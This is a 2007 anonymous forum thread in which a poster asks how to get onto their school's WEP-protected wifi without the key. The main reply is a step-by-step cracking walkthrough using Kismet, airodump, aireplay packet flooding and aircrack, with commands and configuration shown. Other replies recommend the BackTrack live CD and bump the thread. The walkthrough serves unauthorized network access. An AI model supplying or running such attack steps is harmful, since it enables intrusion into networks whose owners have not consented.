Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-

getting onto passwor protected wifi

Name: Anonymous 2007-11-05 14:46

My school has wifi, but i need a wep key to access it. Is there any program that could get me the code?

Name: Anonymous 2007-11-05 14:55

Go down on your sysadmin.

Name: Anonymous 2007-11-05 16:10

Ok, this will explain how to crack most WEP encrypted Access Points out there. There is no simple point and click way to do this (that I'm aware of anyway) If you can't figure this out I don't know what to tell you.

The tools used will be as follows:

Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1

As for wireless cards, i recommend any Prism , Orinoco , or Atheros chip-set based cards (i used the D-Link 650 Rev.1a). The card has to be able to enter monitoring mode.


Getting Started:

Let's see, First thing you are going to want to do is charge your laptop battery. (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);


CODE
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=orinoco,eth1,kismet
#source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone


^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).
Note: To find your cards chipset have a good google on the model number of your card or try checking here http://www.linux-wlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets can
be found on the Kismet website under Documentation.

Changed kismet.conf:

CODE
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
#source=orinoco,eth1,kismet
source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone


Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it has WEP enabled it will have a Y, if not it will be a N.


Going in for the kill:

Making sure you know the channel the Access Point is on (under the CH column in kismet) and also the mac address of the Access Point by hitting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected.

First off you are going to want to set your wireless card to the right mode, depending on what chip-set depends on what commands you have got to use:

CODE
If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2

If you use wlan-ng, run
./wlanng.sh start wlan0 <channel> [comes with  AirePlay2.2]

Otherwise run:
iwconfig ath0 mode Monitor channel <channel>
ifconfig ath0 up


Read the AirePlay2.2 read-me for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
Code:
#./airodump
[version crap]
usage: ./airodump <wifi interface> <output filename> [mac filter]

e.g
./airodump wlan0 linksys

The mac filter is used when you have more than one Access point on the same channel at once, so say you have 'jim_home' and 'linksys' both essid's of access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hitting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from your target, you see the IV column, those are whats known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number). Now we are going to capture a 'weak key' packet from on the network we are targeting and going to flood the Access Point with it in hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now in your other terminal window 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):


CODE
capture packets unless interface #1 is specified.
source options:
-i        : capture packet on-the-fly (default)
-r file   : extract packet from this pcap file
filter options:
-b bssid  : MAC address, Access Point
-d dmac   : MAC address, Destination
-s smac   : MAC address, Source
-m len    : minimum packet length, default:  40
-n len    : maximum packet length, default: 512
-u type   : fc, type     - default: 2 = data
-v subt   : fc, subtype  - default: 0 = normal
-t tods   : fc, To   DS bit - default: any
-f fromds : fc, From DS bit - default: any
-w iswep  : fc, WEP     bit - default: 1
-y        : don't ask questions, assume yes
replay options:
-x nbpps  : number of packets per second
-a bssid  : set Access Point MAC address
-c dmac   : set Destination  MAC address
-h smac   : set Source       MAC address
-o fc0    : set frame control[0] (hex)
-p fc1    : set frame control[1] (hex)
-k        : turn chopchop attack on


e.g
./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0

Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet which then aireplay will ask you if you want to use to then flood the Access Point with that packet. when it asks you if it can use one of the packets hit 'y' then return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast as well, if all went well in about 10mins you should have enough packets to then dump into aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows to terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):


CODE
aircrack 2.1 - (C) 2004 Christophe Devine
usage: ./aircrack [options] <pcap file> <pcap file> ...
-d <start> : debug - specify beginning of the key
-f <fudge> : bruteforce fudge factor (default: 2)
-m <maddr> : MAC address to filter usable packets
-n <nbits> : WEP key length: 64 / 128 / 256 / 512
-p <nfork> : SMP support: # of processes to start
-q <quiet> : Quiet mode (less print more speed)


e.g
./aircrack -n 128 linksys.cap

what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. If all goes well you will get the key in nice red text.

Name: Anonymous 2007-11-05 16:25

>>3
Don't even need Kismet. Airodump works just as well.

>>1
Get BackTrack.

http://www.remote-exploit.org/backtrack.html

Linux live CD that contains everything you need to do what >>3 described. Just hope that your WLAN adapter is capable and supported enough to do what you need to do.

Name: Anonymous 2007-11-06 16:25

bump for usefulness

Don't change these.
Name: Email:
Entire Thread Thread List